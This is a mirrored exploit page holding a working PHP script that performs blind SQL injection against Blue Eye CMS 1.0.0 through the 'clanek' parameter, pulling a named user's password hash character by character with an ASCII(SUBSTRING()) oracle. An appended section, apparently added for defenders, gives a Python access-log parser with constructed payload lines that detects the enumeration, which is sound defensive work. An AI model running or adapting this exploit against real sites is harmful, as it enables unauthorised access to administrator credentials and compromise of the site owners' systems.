Blue Eye CMS <= 1.0.0 (clanek) Blind SQL Injection Exploit
Source: http://darkjoker.net23.net  Author: darkjoker  Published: 2009-01-16
--+++===============================================================+++--
--+++====== Blue Eye CMS <= 1.0.0 Blind SQL Injection Exploit ======+++--
--+++===============================================================+++--


<?php

function usage ()
{
    echo
    "\n[+] Blue Eye CMS <= 1.0.0 Blind SQL Injection Exploit".
    "\n[+] http://kent.dl.sourceforge.net/sourceforge/blueeyecms/blue_eye_cms-1_0_0_preRC.rar".
    "\n[+] Author: darkjoker".
    "\n[+] Site  : http://darkjoker.net23.net".
    "\n[+] Usage : php xpl.php <hostname> <path> <username>".
    "\n[+] Ex.   : php xpl.php localhost /BlueEye admin".
    "\n\n";
    exit ();
}

// Boolean condition sent through the `clanek` parameter: it is true only when
// character $pos of the stored password has ASCII code $chr.
function query ($user, $pos, $chr)
{
    $query = "x' OR ASCII(SUBSTRING((SELECT password FROM blueeye_users WHERE user = '{$user}'),{$pos},1))={$chr} OR '1' = '2";
    $query = str_replace (" ", "%20", $query);
    $query = str_replace ("'", "%27", $query);
    return $query;
}

// The stored value is the base64 encoding of the raw SHA-1 digest; this
// decodes it and returns the digest as hex (it does not recover a password).
function decrypt ($hash)
{
    $sha1 = unpack ("H*", base64_decode ($hash));
    return $sha1 [1];
}

// One oracle request: the article page prints its "Autor:" line only when the
// injected condition holds, so each request answers one yes/no question.
function exploit ($hostname, $path, $user, $pos, $chr)
{
    $fp = fsockopen ($hostname, 80);
    $chr = ord ($chr);
    $query = query ($user, $pos, $chr);

    $get =
    "GET {$path}/index.php?clanek={$query} HTTP/1.1\r\n".
    "Host: {$hostname}\r\n".
    "Connection: Close\r\n\r\n";
    fputs ($fp, $get);

    $reply = "";
    while (!feof ($fp))
        $reply .= fgets ($fp, 1024);

    fclose ($fp);

    preg_match ("/Autor: (.+?)<br>/", $reply, $x);
    if (empty ($x [1]))
        return false;
    else
        return true;
}

if ($argc != 4)
    usage ();

$hostname = $argv [1];
$path = $argv [2];
$user = $argv [3];
// Base64 alphabet: since the stored hash is base64-encoded, only these 65
// symbols can occur at any position.
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=";
$pos = 1;
$chr = 0;
$pass = "";
echo "\n[+] Finding password: ";
while ($chr < strlen ($key))
{
    if (exploit ($hostname, $path, $user, $pos, $key [$chr]))
    {
        $pass .= $key [$chr];
        echo $key [$chr];
        $chr = -1;   // restart the alphabet for the next position
        $pos++;
    }
    $chr++;
}
echo "\n[+] sha1 Hash: ";
echo decrypt ($pass) . "\n\n";

?>
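A defender-side addition, not part of darkjoker's script or of the mirrored page: every request the exploit sends carries the same ASCII(SUBSTRING(...,pos,1))=N comparison in the clanek parameter, and one client cycles through many values for the same position, so the extraction stands out in web-server access logs. The Python below (added here; the Common Log Format lines, IP addresses and timestamps are constructed sample data) parses such lines and reports clients that show that enumeration pattern.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

def probe_log_line(ip, pos, code):
    """Constructed CLF line carrying the oracle payload the script above sends (same %20/%27 encoding)."""
    payload = ("x' OR ASCII(SUBSTRING((SELECT password FROM blueeye_users "
               f"WHERE user = 'admin'),{pos},1))={code} OR '1' = '2")
    payload = payload.replace(" ", "%20").replace("'", "%27")
    return (f'{ip} - - [16/Jan/2009:10:00:00 +0000] '
            f'"GET /BlueEye/index.php?clanek={payload} HTTP/1.1" 200 5120')

# Constructed sample log: one client guesses three values for position 1 and
# one for position 2; a second client views an article normally.
SAMPLE_LOG = [probe_log_line("203.0.113.5", 1, c) for c in (97, 98, 99)]
SAMPLE_LOG.append(probe_log_line("203.0.113.5", 2, 97))
SAMPLE_LOG.append('198.51.100.7 - - [16/Jan/2009:10:00:03 +0000] '
                  '"GET /BlueEye/index.php?clanek=12 HTTP/1.1" 200 6034')

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# The oracle itself: ASCII(SUBSTRING(<anything>, <pos>, 1)) = <byte value>
ORACLE_RE = re.compile(
    r"ASCII\s*\(\s*SUBSTRING\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)", re.I)

def parse_probe(line):
    """Return (client_ip, position, compared_byte) when the request's clanek
    parameter carries the boolean oracle, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, _status = m.groups()
    # parse_qs URL-decodes the value, so %27 and %20 become ' and space again
    for value in parse_qs(urlsplit(target).query).get("clanek", []):
        o = ORACLE_RE.search(value)
        if o:
            return ip, int(o.group(1)), int(o.group(2))
    return None

def find_enumeration(lines, min_guesses=3):
    """Report clients that compare one character position against several
    different byte values, as the guess loop above does for every position."""
    guesses = defaultdict(lambda: defaultdict(set))  # ip -> pos -> {values}
    for line in lines:
        probe = parse_probe(line)
        if probe:
            ip, pos, code = probe
            guesses[ip][pos].add(code)
    return {ip: sorted(positions) for ip, positions in guesses.items()
            if any(len(codes) >= min_guesses for codes in positions.values())}
```

Running `find_enumeration(SAMPLE_LOG)` on the constructed log returns `{'203.0.113.5': [1, 2]}`; the same per-client grouping works on a real access log fed line by line.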


 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved